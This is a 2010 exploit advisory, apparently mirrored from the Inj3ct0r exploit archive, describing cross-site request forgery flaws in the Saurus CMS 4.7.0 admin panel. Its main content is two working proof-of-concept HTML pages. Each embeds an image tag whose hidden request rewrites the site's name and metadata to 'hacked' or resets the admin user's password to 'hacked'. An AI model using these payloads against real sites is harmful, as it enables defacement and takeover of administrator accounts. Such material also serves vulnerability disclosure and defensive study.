Home / os / win7

Saurus CMS Admin Panel Multiple CSRF Vulnerabilities

Posted on 14 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Saurus CMS Admin Panel Multiple CSRF Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== Saurus CMS Admin Panel Multiple CSRF Vulnerabilities ==================================================== # Author: Fady Mohammed Osman (cute hacker) # Software Link: http://www.saurus.info/download/SaurusCMS-4.7.0.tgz # Version: 4.7.0 # Tested on: Ubuntu 10.04 # CVE : [Not available] # This vulnerability allows a malicious hacker to change password of a user and also it allows changing the website information. PoC 1: &lt;html&gt; &lt;head&gt;&lt;title&gt;Saurus CSRF : Change site information&lt;/title&gt;&lt;/head&gt; &lt;body&gt; &lt;img src=&quot;http://localhost/saurus/admin/change_config.php?group=1&amp;site_name=hacked+by+cutehacker&amp;slogan=hacked&amp;meta_title=hacked&amp;meta_description=hacked&amp;meta_keywords=hacked&amp;save=1&amp;flt_keel=1&amp;page_end_html=&amp;timezone=&quot;&gt; &lt;/body&gt; &lt;/html&gt; PoC 2: &lt;html&gt; &lt;head&gt;&lt;title&gt;Saurus CSRF : Change user's password&lt;/title&gt;&lt;/head&gt; &lt;body&gt; &lt;img src=&quot;http://localhost/saurus/admin/edit_user.php?tab=account&amp;user_id=19&amp;group_id=1&amp;op=edit&amp;op2=save&amp;username=admin&amp;password=hacked&amp;password_confirmation=hacked&amp;pass_expires=01.01.2029&amp;is_predefined=1&quot;&gt; &lt;/body&gt; &lt;/html&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP